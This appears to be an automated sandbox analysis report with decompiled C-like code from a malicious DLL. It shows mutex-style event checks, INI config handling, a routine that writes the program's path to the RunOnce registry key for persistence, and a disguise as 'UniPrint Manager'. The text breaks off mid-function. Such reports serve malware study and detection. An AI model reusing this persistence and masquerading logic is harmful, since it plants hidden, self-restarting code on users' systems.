Function 6ECA78B0, Relevance: 52.7, APIs: 25, Strings: 5, Instructions: 223
sleepstringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6ECA78B0() {
				CHAR* _t23;
				char* _t24;
				CHAR* _t26;
				void* _t29;
				intOrPtr _t36;
				CHAR* _t40;
				void* _t52;
				void* _t55;
				int _t56;
				int _t57;
				CHAR* _t60;
				intOrPtr _t62;
				char* _t68;
				CHAR* _t71;
				intOrPtr _t76;
				intOrPtr _t81;
				CHAR* _t82;
				void* _t87;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t112;

				_t60 =  *(_t93 + 0x320);
				if(_t60 == 0) {
					L20:
					_t23 =  *(_t93 + 0x320);
					_push(_t60);
					_push(_t23);
					_push( *((intOrPtr*)(_t93 + 0x31c)));
					M6ECB0594();
					return _t23;
				} else {
					_t24 = M6ECB0570; // 0x0
					if(StrCmpNIA(_t60, _t24, 0xa) == 0) {
						L4:
						_t26 = M6ECB057C; // 0x0
						if(lstrcmpiA(_t60, _t26) == 0) {
							if(M6ECB0514 > 0) {
								do {
									Sleep(0x3e8);
									_t56 = M6ECB0514; // 0x0
									_t57 = _t56 - 1;
									M6ECB0514 = _t57;
								} while (_t57 > 0);
							}
							if(M6ECB04B8 != 0) {
								_t68 = M6ECB0530; // 0xcb2c98
								wsprintfA(_t93 + 0x11c, "\"%s\"", _t68);
								_push("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD");
								_push(_t93 + 0x128);
								_t52 = E6ECA29D0();
								_t93 = _t93 + 0x14;
								if(_t52 != 0) {
									_t89 = 0;
									while(1) {
										_t81 = M6ECB0544; // 0x1
										wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t81);
										_t93 = _t93 + 0x14;
										_t55 = OpenEventA(2, 0, _t93 + 0x10);
										if(_t55 != 0) {
											break;
										}
										Sleep(0x3e8);
										_t89 = _t89 + 1;
										if(_t89 < 0xa) {
											continue;
										}
										goto L12;
									}
									_push(_t55);
									L19:
									CloseHandle();
									ExitProcess(0);
								}
							}
							L12:
							_t92 = 0;
							while(1) {
								_t112 = M6ECB0544; // 0x1
								wsprintfA(_t93 + 0x10, "%s%c%d", _t60, 0x45, 0 | _t112 == 0x00000000);
								_t93 = _t93 + 0x14;
								_t87 = OpenEventA(2, 0, _t93 + 0x10);
								if(_t87 == 0) {
									break;
								}
								_push(_t87);
								if(M6ECB0544 == 0) {
									goto L19;
								}
								SetEvent();
								CloseHandle(_t87);
								Sleep(0x3e8);
								_t92 = _t92 + 1;
								if(_t92 < 0x3c) {
									continue;
								}
								break;
							}
							_push(0xc);
							_push(0x6ecb046c);
							L6ECAC2EE();
							_t76 = M6ECB0544; // 0x1
							wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t76);
							_t95 = _t93 + 0x14;
							 *0x6ecb046c = CreateEventA( *(_t93 + 0x338), 1, 0, _t95 + 0x10);
							_t36 = M6ECB057C; // 0x0
							wsprintfA(_t95 + 0x1c, "%s%s%c", "Global\\", _t36, 0x4b);
							_t96 = _t95 + 0x14;
							 *0x6ecb0470 = CreateEventA(0, 1, 0, _t96 + 0x10);
							E6ECA2170(_t38, 6);
							_t40 = M6ECB057C; // 0x0
							wsprintfA(_t96 + 0x24, "%s%s%c", "Global\\", _t40, 0x52);
							_t97 = _t96 + 0x1c;
							 *0x6ecb0474 = CreateEventA(0, 1, 0, _t97 + 0x10);
							E6ECA2170(_t42, 6);
							M6ECB0510 = CreateThread(0, 0, E6ECA5240, 0, 0, 0);
							E6ECA2DF0("     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", ".bak");
							_t93 = _t97 + 0x10;
						}
						_t62 = M6ECB0544; // 0x1
						wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x48, _t62);
						_t29 = _t93 + 0x24;
						_push(_t29);
						_push( *((intOrPtr*)(_t93 + 0x33c)));
						_push( *(_t93 + 0x338));
						M6ECB0594();
						return _t29;
					} else {
						_t71 = M6ECB0574; // 0x0
						if(lstrcmpiA(_t60, _t71) == 0) {
							goto L4;
						} else {
							_t82 = M6ECB0578; // 0x0
							if(lstrcmpiA(_t60, _t82) != 0) {
								goto L20;
							} else {
								goto L4;
							}
						}
					}
				}
			}

0x6eca78b7
0x6eca78c1
0x6eca7b4e
0x6eca7b4e
0x6eca7b5c
0x6eca7b5d
0x6eca7b5e
0x6eca7b5f
0x6eca7b6d
0x6eca78c7
0x6eca78c7
0x6eca78de
0x6eca7900
0x6eca7900
0x6eca7913
0x6eca7920
0x6eca7922
0x6eca7927
0x6eca792d
0x6eca7932
0x6eca7933
0x6eca7938
0x6eca7922
0x6eca7943
0x6eca7945
0x6eca7959
0x6eca7960
0x6eca7968
0x6eca7969
0x6eca796e
0x6eca7973
0x6eca7975
0x6eca7977
0x6eca7977
0x6eca798b
0x6eca798d
0x6eca7999
0x6eca79a1
0x00000000
0x00000000
0x6eca79ac
0x6eca79b2
0x6eca79b6
0x00000000
0x00000000
0x00000000
0x6eca79b6
0x6eca7b3f
0x6eca7b40
0x6eca7b40
0x6eca7b48
0x6eca7b48
0x6eca7973
0x6eca79b8
0x6eca79b8
0x6eca79c0
0x6eca79c2
0x6eca79d9
0x6eca79db
0x6eca79ed
0x6eca79f1
0x00000000
0x00000000
0x6eca79fa
0x6eca79fb
0x00000000
0x00000000
0x6eca7a01
0x6eca7a08
0x6eca7a13
0x6eca7a19
0x6eca7a1d
0x00000000
0x00000000
0x00000000
0x6eca7a1d
0x6eca7a1f
0x6eca7a21
0x6eca7a26
0x6eca7a2b
0x6eca7a3f
0x6eca7a4e
0x6eca7a5f
0x6eca7a64
0x6eca7a79
0x6eca7a7b
0x6eca7a8e
0x6eca7a93
0x6eca7a98
0x6eca7aaf
0x6eca7ab1
0x6eca7ac4
0x6eca7ac9
0x6eca7ae6
0x6eca7af6
0x6eca7afb
0x6eca7afb
0x6eca7afe
0x6eca7b12
0x6eca7b25
0x6eca7b29
0x6eca7b2a
0x6eca7b2b
0x6eca7b2c
0x6eca7b3c
0x6eca78e0
0x6eca78e0
0x6eca78ec
0x00000000
0x6eca78ee
0x6eca78ee
0x6eca78fa
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca78fa
0x6eca78ec
0x6eca78de

APIs

StrCmpNIA.SHLWAPI(?,00000000,0000000A), ref: 6ECA78D0
lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA78E8
lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA78F6
lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA7909
Sleep.KERNEL32(000003E8), ref: 6ECA7927
wsprintfA.USER32 ref: 6ECA7959
wsprintfA.USER32 ref: 6ECA798B
OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA7999
Sleep.KERNEL32(000003E8), ref: 6ECA79AC
wsprintfA.USER32 ref: 6ECA79D9
OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA79E7
SetEvent.KERNEL32(00000000), ref: 6ECA7A01
CloseHandle.KERNEL32(00000000), ref: 6ECA7A08
Sleep.KERNEL32(000003E8), ref: 6ECA7A13
RtlZeroMemory.NTDLL(6ECB046C,0000000C), ref: 6ECA7A26
wsprintfA.USER32 ref: 6ECA7A3F
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6ECA7A5B
wsprintfA.USER32 ref: 6ECA7A79
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA7A89
wsprintfA.USER32 ref: 6ECA7AAF
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA7ABF
CreateThread.KERNEL32 ref: 6ECA7AE0
wsprintfA.USER32 ref: 6ECA7B12
CloseHandle.KERNEL32(00000000), ref: 6ECA7B40
ExitProcess.KERNEL32 ref: 6ECA7B48

Strings

Global\, xrefs: 6ECA7A6A, 6ECA7AA0
%s%s%c, xrefs: 6ECA7A73, 6ECA7AA9
%s%c%d, xrefs: 6ECA7985, 6ECA79D3, 6ECA7A39, 6ECA7B0C
"%s", xrefs: 6ECA7953
.bak, xrefs: 6ECA7AF0

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Event$Create$Sleeplstrcmpi$CloseHandleOpen$ExitMemoryProcessThreadZero
String ID: "%s"$%s%c%d$%s%s%c$.bak$Global\
API String ID: 954934373-1282085331
Opcode ID: a0b13dcd5b886e3efc2a748f513a12f738d40a9419742b7d3fd2180de2a92f01
Instruction ID: 2a217fc38e2b37f741d88ae7abb508b8952b3c956b01316d95d8e9b2edc8ee55
Opcode Fuzzy Hash: a0b13dcd5b886e3efc2a748f513a12f738d40a9419742b7d3fd2180de2a92f01
Instruction Fuzzy Hash: BD7197B1640705AFE720DBA8CE86FAB7B7CAB85705F004419BB1597185F670A9088F65

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA6A90, Relevance: 49.2, APIs: 21, Strings: 7, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E6ECA6A90(CHAR* _a4, intOrPtr _a8) {
				void _v264;
				char _v266;
				char _v267;
				char _v268;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				short _v275;
				char _v276;
				void* _t53;
				CHAR* _t55;
				CHAR* _t56;
				CHAR* _t59;
				CHAR* _t60;
				CHAR* _t62;
				CHAR* _t70;
				CHAR* _t72;
				CHAR* _t73;
				int _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t78;
				CHAR* _t80;
				char _t81;
				void* _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				char _t97;
				CHAR* _t103;
				CHAR* _t104;
				CHAR* _t105;
				int _t108;
				CHAR* _t110;
				CHAR* _t113;
				CHAR* _t121;
				CHAR* _t122;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t132;
				int _t133;
				int _t135;
				CHAR* _t139;

				_t139 = _a4;
				if(_t139 != 0) {
					_t88 = _t139[4];
					if(_t88 != 0) {
						HeapFree(GetProcessHeap(), 0, _t88);
					}
					_t53 = _t139[8];
					if(_t53 != 0) {
						_t53 = HeapFree(GetProcessHeap(), 0, _t53);
					}
				}
				if(_a8 != 0) {
					return _t53;
				} else {
					if(_t139 == 0) {
						_t86 = M6ECB04CC; // 0xcb2da8
						_t132 = M6ECB04DC; // 0x0
						_v268 = 0x67;
						_v267 = 0x64;
						_v266 = 0;
						WritePrivateProfileStringA(_t132,  &_v268, _t139, _t86);
					}
					_v275 = 0x64;
					asm("sbb bl, bl");
					_t97 = ( ~_t139 & 0x000000f5) + 0x6e;
					_v273 = 0;
					_v276 = 0x68;
					_v274 = _t97;
					E6ECA1D30(0x6ecb0034);
					_t55 = M6ECB04CC; // 0xcb2da8
					_t56 = M6ECB04DC; // 0x0
					_t133 = GetPrivateProfileStringA(_t56,  &_v276, 0x6ecb0034,  &_v264, 0x104, _t55);
					E6ECA1D30(0x6ecb0034);
					if(_t139 == 0) {
						_t59 = M6ECB04CC; // 0xcb2da8
						_t60 = M6ECB04DC; // 0x0
						_v274 = 0x63;
						WritePrivateProfileStringA(_t60,  &_v276,  &_v264, _t59);
						_t103 = M6ECB04CC; // 0xcb2da8
						_t62 = M6ECB04DC; // 0x0
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t62,  &_v276, 0, _t103);
					} else {
						_t15 = _t133 + 1; // 0x1
						_t85 = HeapAlloc(GetProcessHeap(), 8, _t15);
						_t139[4] = _t85;
						RtlMoveMemory(_t85,  &_v264, _t133);
						 *_t139 = _t133;
					}
					_v275 = 0x70;
					_v274 = _t97;
					E6ECA1D30(0x6ecb0010);
					_t104 = M6ECB04CC; // 0xcb2da8
					_t105 = M6ECB04DC; // 0x0
					_t135 = GetPrivateProfileStringA(_t105,  &_v276, 0x6ecb0010,  &_v264, 0x104, _t104);
					E6ECA1D30(0x6ecb0010);
					if(_t139 == 0) {
						_t121 = M6ECB04CC; // 0xcb2da8
						_t122 = M6ECB04DC; // 0x0
						_v274 = 0x63;
						WritePrivateProfileStringA(_t122,  &_v276,  &_v264, _t121);
						_t70 = M6ECB04CC; // 0xcb2da8
						_t123 = M6ECB04DC; // 0x0
						_v274 = 0x6e;
						WritePrivateProfileStringA(_t123,  &_v276, 0, _t70);
					} else {
						_t27 = _t135 + 1; // 0x1
						_t83 = HeapAlloc(GetProcessHeap(), 8, _t27);
						_t139[8] = _t83;
						RtlMoveMemory(_t83,  &_v264, _t135);
					}
					_t72 = M6ECB04CC; // 0xcb2da8
					_t108 =  *0x6ecb000c; // 0x1
					_t73 = M6ECB04DC; // 0x0
					_t124 =  &_v276;
					_v274 = _t97;
					_v275 = 0x73;
					_t74 = GetPrivateProfileIntA(_t73, _t124, _t108, _t72);
					if(_t139 != 0) {
						_v275 = 0x74;
						_t139[0xc] = 0 | _t74 != 0x00000000;
						_t113 = M6ECB04CC; // 0xcb2da8
						_t80 = M6ECB04DC; // 0x0
						_t81 = GetPrivateProfileIntA(_t80,  &_v276, 0xc, _t113);
						_t139[0x10] = _t81;
						return _t81;
					}
					_t75 = M6ECB04CC; // 0xcb2da8
					_t76 = M6ECB04DC; // 0x0
					_v272 = (_t124 & 0xffffff00 | _t74 == 0x00000001) + 0x30;
					_v271 = 0;
					_v274 = 0x63;
					WritePrivateProfileStringA(_t76,  &_v276,  &_v272, _t75);
					_t110 = M6ECB04CC; // 0xcb2da8
					_t78 = M6ECB04DC; // 0x0
					_v274 = 0x6e;
					return WritePrivateProfileStringA(_t78,  &_v276, 0, _t110);
				}
			}

0x6eca6a97
0x6eca6aa1
0x6eca6aa3
0x6eca6aae
0x6eca6aba
0x6eca6aba
0x6eca6abc
0x6eca6ac1
0x6eca6acd
0x6eca6acd
0x6eca6ac1
0x6eca6ad7
0x6eca6cee
0x6eca6add
0x6eca6ae2
0x6eca6ae4
0x6eca6ae9
0x6eca6af7
0x6eca6afc
0x6eca6b00
0x6eca6b05
0x6eca6b05
0x6eca6b0b
0x6eca6b13
0x6eca6b19
0x6eca6b21
0x6eca6b26
0x6eca6b2b
0x6eca6b2f
0x6eca6b34
0x6eca6b43
0x6eca6b64
0x6eca6b66
0x6eca6b70
0x6eca6b98
0x6eca6ba4
0x6eca6bb4
0x6eca6bb9
0x6eca6bbb
0x6eca6bc1
0x6eca6bcf
0x6eca6bd4
0x6eca6b72
0x6eca6b72
0x6eca6b7f
0x6eca6b8c
0x6eca6b8f
0x6eca6b94
0x6eca6b94
0x6eca6bdb
0x6eca6be0
0x6eca6be4
0x6eca6be9
0x6eca6bf3
0x6eca6c15
0x6eca6c17
0x6eca6c22
0x6eca6c4e
0x6eca6c5b
0x6eca6c6c
0x6eca6c71
0x6eca6c73
0x6eca6c78
0x6eca6c87
0x6eca6c8c
0x6eca6c24
0x6eca6c24
0x6eca6c31
0x6eca6c3e
0x6eca6c41
0x6eca6c46
0x6eca6c8e
0x6eca6c93
0x6eca6c9a
0x6eca6ca0
0x6eca6ca5
0x6eca6cb0
0x6eca6cb5
0x6eca6cb9
0x6eca6cc6
0x6eca6ccd
0x6eca6cd0
0x6eca6cd6
0x6eca6ce0
0x6eca6ce2
0x00000000
0x6eca6ce5
0x6eca6cf2
0x6eca6cfb
0x6eca6d07
0x6eca6d12
0x6eca6d17
0x6eca6d1c
0x6eca6d1e
0x6eca6d24
0x6eca6d32
0x6eca6d42
0x6eca6d42

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 6ECA6AB3
HeapFree.KERNEL32(00000000), ref: 6ECA6ABA
GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 6ECA6AC6
HeapFree.KERNEL32(00000000), ref: 6ECA6ACD
WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6B05
GetPrivateProfileStringA.KERNEL32(00000000,?,6ECB0034,?,00000104,00CB2DA8), ref: 6ECA6B5D
GetProcessHeap.KERNEL32(00000008,00000001), ref: 6ECA6B78
HeapAlloc.KERNEL32(00000000), ref: 6ECA6B7F
RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6ECA6B8F
WritePrivateProfileStringA.KERNEL32 ref: 6ECA6BB9
WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6BD4
GetPrivateProfileStringA.KERNEL32(00000000,?,6ECB0010,?,00000104,00CB2DA8), ref: 6ECA6C0E
GetProcessHeap.KERNEL32(00000008,00000001), ref: 6ECA6C2A
HeapAlloc.KERNEL32(00000000), ref: 6ECA6C31
RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 6ECA6C41
WritePrivateProfileStringA.KERNEL32 ref: 6ECA6C71
WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6C8C
GetPrivateProfileIntA.KERNEL32 ref: 6ECA6CB5
GetPrivateProfileIntA.KERNEL32 ref: 6ECA6CE0
WritePrivateProfileStringA.KERNEL32(00000000,?,?,00CB2DA8), ref: 6ECA6D1C
WritePrivateProfileStringA.KERNEL32(00000000,?,00000000,00CB2DA8), ref: 6ECA6D37

Strings

h, xrefs: 6ECA6B26
n, xrefs: 6ECA6BCF
n, xrefs: 6ECA6D32
g, xrefs: 6ECA6AF7
p, xrefs: 6ECA6BDB
s, xrefs: 6ECA6CB0
t, xrefs: 6ECA6CC6

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
String ID: g$h$n$n$p$s$t
API String ID: 1023576463-1140765434
Opcode ID: 5f1548418b912d39e00dd1629f842d1a319d5e539483d5515085a557083a74ba
Instruction ID: 2e0126a6d25d0cdbbb400fd4a4d81e5f69f220a8811a10af6376ff3f2c3c52bb
Opcode Fuzzy Hash: 5f1548418b912d39e00dd1629f842d1a319d5e539483d5515085a557083a74ba
Instruction Fuzzy Hash: ED816F72518742EFD700CB98DA45E9BB7F9AF99744F048A0CFA8597240E674ED0CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4CA0, Relevance: 40.4, APIs: 19, Strings: 4, Instructions: 150
memoryregistrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECA4CA0(void* __eflags, intOrPtr _a12) {
				int _v252;
				char _v256;
				int _v260;
				int _v264;
				void* _v276;
				void* _v284;
				char _v288;
				intOrPtr _t25;
				void* _t26;
				long _t31;
				int _t34;
				char* _t37;
				char* _t45;
				int _t49;
				int _t56;
				char* _t59;
				char* _t60;
				char* _t71;
				CHAR* _t73;
				void* _t74;
				CHAR* _t76;

				_t25 = M6ECB0588; // 0x0
				_t26 = E6ECAA2F0(_t25, 0, 0);
				_t74 = _t26;
				if(_t74 != 0) {
					_v288 = 0x4f6e7552;
					_v284 = 0x65636e;
					wsprintfA( &_v264, "%s\\%s", _t74,  &_v288);
					HeapFree(GetProcessHeap(), 0, _t74);
					_v284 = 0;
					_t31 = RegCreateKeyExA(0x80000001,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v284, 0);
					if(_t31 != 0) {
						L14:
						return _t31;
					}
					if(_a12 == 0) {
						_v264 = 0;
						_t73 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						if(_t73 == 0) {
							L13:
							_t31 = RegCloseKey(_v284);
							goto L14;
						}
						_t59 = M6ECB0530; // 0xcb2c98
						_t34 = wsprintfA(_t73, "\"%s\" f", _t59);
						_t60 = M6ECB053C; // 0xcb2cac
						_v252 = _t34;
						_v264 = 0;
						_v260 = 1;
						if(RegQueryValueExA(_v276, _t60, 0,  &_v260, 0,  &_v264) != 0) {
							L11:
							_t37 = M6ECB053C; // 0xcb2cac
							RegSetValueExA(_v276, _t37, 0, 1, _t73, _v252 + 1);
							L12:
							HeapFree(GetProcessHeap(), 0, _t73);
							goto L13;
						}
						_t76 = HeapAlloc(GetProcessHeap(), 8, _v264 + 1);
						if(_t76 == 0) {
							goto L11;
						}
						_t45 = M6ECB053C; // 0xcb2cac
						if(RegQueryValueExA(_v276, _t45, 0,  &_v260, _t76,  &_v264) != 0) {
							L9:
							_t56 = _v256;
							L10:
							HeapFree(GetProcessHeap(), 0, _t76);
							if(_t56 != 0) {
								goto L12;
							}
							goto L11;
						}
						_t49 = lstrcmpiA(_t76, _t73);
						_t56 = 1;
						if(_t49 == 0) {
							goto L10;
						}
						goto L9;
					}
					_t71 = M6ECB053C; // 0xcb2cac
					RegDeleteValueA(_v284, _t71);
					goto L13;
				}
				return _t26;
			}

0x6eca4ca0
0x6eca4cb2
0x6eca4cb7
0x6eca4cbe
0x6eca4cdc
0x6eca4ce4
0x6eca4cec
0x6eca4cfc
0x6eca4d1b
0x6eca4d1f
0x6eca4d27
0x6eca4e42
0x00000000
0x6eca4e43
0x6eca4d34
0x6eca4d54
0x6eca4d63
0x6eca4d67
0x6eca4e37
0x6eca4e3c
0x00000000
0x6eca4e3c
0x6eca4d6d
0x6eca4d7a
0x6eca4d7c
0x6eca4d96
0x6eca4da3
0x6eca4dab
0x6eca4db7
0x6eca4e0f
0x6eca4e13
0x6eca4e25
0x6eca4e2b
0x6eca4e31
0x00000000
0x6eca4e31
0x6eca4dc6
0x6eca4dca
0x00000000
0x00000000
0x6eca4dcc
0x6eca4de8
0x6eca4dfb
0x6eca4dfb
0x6eca4dff
0x6eca4e05
0x6eca4e0d
0x00000000
0x00000000
0x00000000
0x6eca4e0d
0x6eca4dec
0x6eca4df2
0x6eca4df9
0x00000000
0x00000000
0x00000000
0x6eca4df9
0x6eca4d36
0x6eca4d42
0x00000000
0x6eca4d42
0x6eca4e4c

APIs

Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA311
Part of subcall function 6ECAA2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0), ref: 6ECAA323
Part of subcall function 6ECAA2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C,00000000,00000034,?,?,?,6ECB03A0,0000009C), ref: 6ECAA32A
Part of subcall function 6ECAA2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6ECA6F16,00CD21B8,00000001,0000009C), ref: 6ECAA33E

wsprintfA.USER32 ref: 6ECA4CEC
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6ECA4CF9
HeapFree.KERNEL32(00000000), ref: 6ECA4CFC
RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6ECA4D1F
RegDeleteValueA.ADVAPI32(?,00CB2CAC), ref: 6ECA4D42
GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA4D58
HeapAlloc.KERNEL32(00000000), ref: 6ECA4D61
wsprintfA.USER32 ref: 6ECA4D7A
RegQueryValueExA.ADVAPI32 ref: 6ECA4DB3
GetProcessHeap.KERNEL32(00000008,?), ref: 6ECA4DC1
HeapAlloc.KERNEL32(00000000), ref: 6ECA4DC4
RegQueryValueExA.ADVAPI32(00CB2CAC,00CB2CAC,00000000,?,00000000,?), ref: 6ECA4DE4
lstrcmpiA.KERNEL32(00000000,00000000), ref: 6ECA4DEC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4E02
HeapFree.KERNEL32(00000000), ref: 6ECA4E05
RegSetValueExA.ADVAPI32(00000000,00CB2CAC,00000000,00000001,00000000,?), ref: 6ECA4E25
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4E2E
HeapFree.KERNEL32(00000000), ref: 6ECA4E31
RegCloseKey.ADVAPI32(?), ref: 6ECA4E3C

Strings

"%s" f, xrefs: 6ECA4D74
%s\%s, xrefs: 6ECA4CD6
nce, xrefs: 6ECA4CE4
RunO, xrefs: 6ECA4CDC

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
String ID: "%s" f$%s\%s$RunO$nce
API String ID: 5215680-3682672340
Opcode ID: d13ea4d1230d09131a0b629fbea35cfda5f9d0b930acac27140d60669df593b3
Instruction ID: dbb5c930253fc97059f28de3dbbf116c37e076ff25efeaf4e77cdb0126003cc9
Opcode Fuzzy Hash: d13ea4d1230d09131a0b629fbea35cfda5f9d0b930acac27140d60669df593b3
Instruction Fuzzy Hash: 4441A171504702ABD710DBA9DD85F6BBBBCFBCAB08F00490CFA5597240EA70D805CB66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA52B0, Relevance: 33.3, APIs: 12, Strings: 7, Instructions: 97
memorysleepCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6ECA52B0(void* __ebp, intOrPtr _a4) {
				char _v256;
				char _v264;
				long _v268;
				void* __ebx;
				void* __edi;
				intOrPtr _t7;
				void* _t14;
				long _t19;
				void* _t25;
				intOrPtr _t28;
				void* _t30;
				void* _t33;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				long* _t40;
				long* _t41;

				_t40 =  &_v268;
				_t36 = _a4;
				if(M6ECB050C != 0 || _t36 != 0) {
					E6ECA4130();
				}
				_t7 = M6ECB0544; // 0x1
				if(_t7 != 0 && (M6ECB0540 != 0 || _t36 != 0)) {
					_t30 = M6ECB0534; // 0xcc2700
					_push(1);
					_push(L"Printer manager");
					E6ECA4C30(_t7, _t30, L"UniPrint Manager");
					_t40 =  &(_t40[5]);
				}
				_push(_t25);
				_push(_t33);
				_push(0);
				_push(0);
				E6ECA44D0(_t25, _t33);
